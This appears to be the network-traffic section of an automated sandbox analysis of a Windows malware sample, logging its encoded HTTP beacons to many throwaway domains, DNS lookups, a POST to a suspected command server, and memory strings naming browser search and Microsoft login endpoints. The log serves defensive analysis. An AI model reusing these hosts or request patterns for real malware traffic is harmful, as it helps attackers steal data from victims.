                Source: global trafficHTTP traffic detected: GET /u11p/?bbg=kZhtX7A2sH2Eo6iMIWGZUso0i5sc+RpFVMT48ed6Ly4yhf18n7pPOVMHRPIihFA/8qVQHA8l2MRLeM0A4ZXpHK5zp1AfcmEdh8Me18rVPXN1xmrP+jJ5uM9Xypqrvyuogg==&4Hph=tXCXkpKPT HTTP/1.1Host: www.duwixushx.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ib68/?bbg=qBcx+6F+oW3FLMWCFGkku82ue0n+3hqnVOqcrGj635TZ+b/5EUsj5Zs7kPmyn50XK/Tp7ki26yO6xrdZPEzCUCLwZvbCuKVw+bGKkpnxeC2/cgva9NQSwRBKH/jO8oEkZw==&4Hph=tXCXkpKPT HTTP/1.1Host: www.maitreyatoys.worldAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /tw1g/?bbg=fX3UOxnLllreThWFlcCTjb1Gj8v81Qg4BBMMPlWtmipxCrV4LuGb/+qUB8ds6Milzu4Vsg6gjoKyWT3+exaSJF/XiV2wljFcpTs2dr1B9jzRtZTommTdOKRk2oHkAr6Pug==&4Hph=tXCXkpKPT HTTP/1.1Host: www.44ynh.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /iwr0/?bbg=e58ykDXR7JLcMoNRWEYHn8cc5Pgwf9t/kt1uMD4eNiXxy32DdM8h+aEO1Z89nPF0w4/1A2XEUA4gZargWKfwgcGRrE4dAF8MmhPgLvSHdRT95UfShtNaVZFD9IYeOb8YiA==&4Hph=tXCXkpKPT HTTP/1.1Host: www.montero-beauty.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /2eo9/?4Hph=tXCXkpKPT&bbg=7XmzYZMr38GxQ9PAC0sOj6+qqhhrckRH6Nq2/pV9l30WNGyrAQ9CTyNBBx9RcOn2QODlxsxyZKKfc2UgMRuej2Phu9qscykKfItb6htlbLHkk3vv6Dp9SyXAhpxA8WVGQQ== HTTP/1.1Host: www.beyondfitness.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /29r3/?bbg=3G351C0lqnMT5KSEhB6QkRv7ej9rv2/VXMsOqSS+pJvTAxAcXzEXZLJlfm59V9XHiWzt79CRV1JOIFYnv3Wo76qcp/vE/TTTBmL93e2sLUBUnoZ9o80wo25/oxpiL6JXtg==&4Hph=tXCXkpKPT HTTP/1.1Host: www.50food.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /p9ll/?bbg=xricoPUhMXLl8f28VT4xzhY6t4bZSB0G1+CjUa2j1QQaHO4mbNQdsyhC9y7mIsh8JvmYw8eVSH73nhuf0Xl7ku83LF6dLivHkvOUWe3dGgjTeU1FcMTS2wwr3KqFBZ3Pmw==&4Hph=tXCXkpKPT HTTP/1.1Host: www.dymar.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /t846/?bbg=4fXDidx2O/QZfth3GLJUvrPztavIjtsHM9AccgwO7Wsf+4yyKbVsNUq9n3baOtbXgE7PgS+t0KauVD8p9LNNPlTmJLw1k/V9vRHWZxkQ6THznCqf0VxFVE5mRi5gyV9wCg==&4Hph=tXCXkpKPT HTTP/1.1Host: www.earbudsstore.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /jcfc/?bbg=0yEj10EZmitUhtYjdkKec5xdEI8NxyKfcM7U8ztUVuouZsC423bB43cLiOUB/IRFTMn/ihN/EtpU6HblaUashI5siqQp3v4hHHpGQ8dsEXU8uptspqs9cFl8luc9oYZGow==&4Hph=tXCXkpKPT HTTP/1.1Host: www.oneeyetrousersnake.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /h8xm/?bbg=Djz/HatsL8//q4jEHVXjpeAGEqEdbJOsV0SUedpbc1iwsSAKW9bJKhlacHYz2CYne1ysE/rGqXnA3+5LllbTg/a50arMCuQoFYEtuqwmipYtkk9+U+/725Z0eP7TAeqp5A==&4Hph=tXCXkpKPT HTTP/1.1Host: www.tals.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
                Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
                Source: global trafficDNS traffic detected: DNS query: www.sunnyz.store
                Source: global trafficDNS traffic detected: DNS query: www.d48dk.top
                Source: global trafficDNS traffic detected: DNS query: www.8312zcksnu.bond
                Source: global trafficDNS traffic detected: DNS query: www.snyp.shop
                Source: global trafficDNS traffic detected: DNS query: www.duwixushx.xyz
                Source: global trafficDNS traffic detected: DNS query: www.maitreyatoys.world
                Source: global trafficDNS traffic detected: DNS query: www.44ynh.top
                Source: global trafficDNS traffic detected: DNS query: www.montero-beauty.online
                Source: global trafficDNS traffic detected: DNS query: www.beyondfitness.live
                Source: global trafficDNS traffic detected: DNS query: www.50food.com
                Source: global trafficDNS traffic detected: DNS query: www.dymar.shop
                Source: global trafficDNS traffic detected: DNS query: www.earbudsstore.shop
                Source: global trafficDNS traffic detected: DNS query: www.oneeyetrousersnake.xyz
                Source: global trafficDNS traffic detected: DNS query: www.tals.xyz
                Source: unknownHTTP traffic detected: POST /wlyolqts HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 804
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 18:52:16 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66927002-8a" Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 18:52:18 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66927002-8a" Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 18:52:21 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66927002-8a" Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 18:52:24 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66927002-8a" Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 18:53:01 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 18:53:03 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 18:53:06 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 18:53:08 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: nginx Date: Fri, 10 Jan 2025 18:53:14 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: nginx Date: Fri, 10 Jan 2025 18:53:17 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: nginx Date: Fri, 10 Jan 2025 18:53:19 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 10 Jan 2025 18:53:28 GMT | Content-Type: text/html | Content-Length: 138 | Connection: close | ETag: "66df0ead-8a" | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 10 Jan 2025 18:53:30 GMT | Content-Type: text/html | Content-Length: 138 | Connection: close | ETag: "66df0ead-8a" | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 10 Jan 2025 18:53:33 GMT | Content-Type: text/html | Content-Length: 138 | Connection: close | ETag: "66df0ead-8a" | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 10 Jan 2025 18:53:36 GMT | Content-Type: text/html | Content-Length: 138 | Connection: close | ETag: "66df0ead-8a" | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 10 Jan 2025 18:53:50 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | x-ray: p13015:0.000
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 10 Jan 2025 18:53:56 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 10 Jan 2025 18:53:59 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 10 Jan 2025 18:54:01 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 10 Jan 2025 18:54:04 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx | Date: Fri, 10 Jan 2025 18:54:07 GMT | Content-Type: text/html | Content-Length: 166 | Connection: close | Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx | Date: Fri, 10 Jan 2025 18:54:09 GMT | Content-Type: text/html | Content-Length: 166 | Connection: close | Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx | Date: Fri, 10 Jan 2025 18:54:12 GMT | Content-Type: text/html | Content-Length: 166 | Connection: close | Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 10 Jan 2025 18:54:14 GMT | Content-Type: text/html | Content-Length: 0 | Connection: close
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 10 Jan 2025 18:54:24 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Set-Cookie: OCSESSID=7cc91b54a734037afb07d620d6; path=/ | Set-Cookie: language=ru-ru; expires=Sun, 09-Feb-2025 18:54:24 GMT; Max-Age=2592000; path=/; domain=www.dymar.shop | Set-Cookie: currency=UAH; expires=Sun, 09-Feb-2025 18:54:24 GMT; Max-Age=2592000; path=/; domain=www.dymar.shop | x-ray: wnp32698:0.120/wn32698:0.120/wa32698:D=118049 | Content-Encoding: gzip
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 10 Jan 2025 18:54:26 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Set-Cookie: OCSESSID=53be1d3a674e5327abd56ef2cf; path=/ | Set-Cookie: language=ru-ru; expires=Sun, 09-Feb-2025 18:54:26 GMT; Max-Age=2592000; path=/; domain=www.dymar.shop | Set-Cookie: currency=UAH; expires=Sun, 09-Feb-2025 18:54:26 GMT; Max-Age=2592000; path=/; domain=www.dymar.shop | x-ray: wnp32698:0.110/wn32698:0.110/wa32698:D=109573 | Content-Encoding: gzip
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 10 Jan 2025 18:54:29 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Set-Cookie: OCSESSID=4ccdd6c1675039079c9354df9d; path=/ | Set-Cookie: language=ru-ru; expires=Sun, 09-Feb-2025 18:54:29 GMT; Max-Age=2592000; path=/; domain=www.dymar.shop | Set-Cookie: currency=UAH; expires=Sun, 09-Feb-2025 18:54:29 GMT; Max-Age=2592000; path=/; domain=www.dymar.shop | x-ray: wnp32698:0.110/wn32698:0.110/wa32698:D=112835 | Content-Encoding: gzip
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 10 Jan 2025 18:54:32 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Set-Cookie: OCSESSID=09d5d2ba5f77960f0f6a6c4e21; path=/ | Set-Cookie: language=ru-ru; expires=Sun, 09-Feb-2025 18:54:31 GMT; Max-Age=2592000; path=/; domain=www.dymar.shop | Set-Cookie: currency=UAH; expires=Sun, 09-Feb-2025 18:54:31 GMT; Max-Age=2592000; path=/; domain=www.dymar.shop | x-ray: wnp32698:0.120/wn32698:0.120/wa32698:D=118787 | Data Ascii: 4373<!DOCTYPE html><!--[if IE]><![endif]--><!--[if IE 8 ]><html dir="ltr" lang="ru" class="ie8"><![endif]--><!--[if IE 9 ]><html dir="ltr" lang="ru" class="ie9"><![endif]--><!--[if (gt IE 9)|!(IE)]><!--><html dir="ltr" lang="ru"><!--<![endif]--><head> <link rel="cano
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html | date: Fri, 10 Jan 2025 18:54:51 GMT | transfer-encoding: chunked | connection: close
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html | date: Fri, 10 Jan 2025 18:54:53 GMT | transfer-encoding: chunked | connection: close
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html date: Fri, 10 Jan 2025 18:54:56 GMT transfer-encoding: chunked connection: close
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html date: Fri, 10 Jan 2025 18:54:58 GMT transfer-encoding: chunked connection: close
                Source: OVZizpEU7Q.exe, 00000000.00000002.2315025935.0000000000D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/
                Source: OVZizpEU7Q.exe, 00000000.00000002.2315025935.0000000000D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/8#
                Source: OVZizpEU7Q.exe, 00000000.00000002.2315025935.0000000000D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/rO#
                Source: OVZizpEU7Q.exe, 00000000.00000002.2315025935.0000000000D91000.00000004.00000020.00020000.00000000.sdmp, OVZizpEU7Q.exe, 00000000.00000002.2315317261.0000000000D9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/wlyolqts
                Source: OVZizpEU7Q.exe, 00000000.00000002.2315025935.0000000000D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/y#
                Source: OVZizpEU7Q.exe, 00000000.00000002.2312003459.0000000000CB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pywolwnvd.biz/
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.00000000053EA000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4760274457.0000000007CB0000.00000004.00000800.00020000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006AAA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.earbudsstore.shop/t846?gp=1&js=1&uuid=1736535285.9772559917&other_args=eyJ1cmkiOiAiL3Q4ND
                Source: CkszoACLEZHP.exe, 00000006.00000002.4762982458.0000000006367000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tals.xyz
                Source: CkszoACLEZHP.exe, 00000006.00000002.4762982458.0000000006367000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tals.xyz/h8xm/
                Source: choice.exe, 00000007.00000002.4758770775.0000000006AAA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www70.earbudsstore.shop/
                Source: choice.exe, 00000007.00000003.2868947216.00000000080B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.000000000557C000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006C3C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://browsehappy.com/
                Source: choice.exe, 00000007.00000003.2868947216.00000000080B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: choice.exe, 00000007.00000003.2868947216.00000000080B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: choice.exe, 00000007.00000003.2868947216.00000000080B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.00000000045C8000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000005C88000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://djwe.bekru.wgljk.cn/123.html
                Source: choice.exe, 00000007.00000003.2868947216.00000000080B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: choice.exe, 00000007.00000003.2868947216.00000000080B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: choice.exe, 00000007.00000003.2868947216.00000000080B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000004DA2000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006462000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000004DA2000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006462000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000004DA2000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006462000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.00000000045C8000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000005C88000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?1da591af2ff1138fe9a515dc33eb5bf7
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000004DA2000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.0000000006462000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://hosting.xyz/wiki/hosting/errors/site-not-served/
                Source: CkszoACLEZHP.exe, 00000006.00000002.4761022194.0000000004A7E000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 00000007.00000002.4758770775.000000000613E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://joker.com/?pk_campaign=Parking&pk_kwd=text
                Source: choice.exe, 00000007.00000002.4757471775.0000000003236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: choice.exe, 00000007.00000002.4757471775.0000000003236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: choice.exe, 00000007.00000002.4757471775.0000000003236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: choice.exe, 00000007.00000002.4757471775.0000000003236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: choice.exe, 00000007.00000002.4757471775.0000000003236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: choice.exe, 00000007.00000002.4757471775.0000000003236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: choice.exe, 00000007.00000003.2863254118.0000000007FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
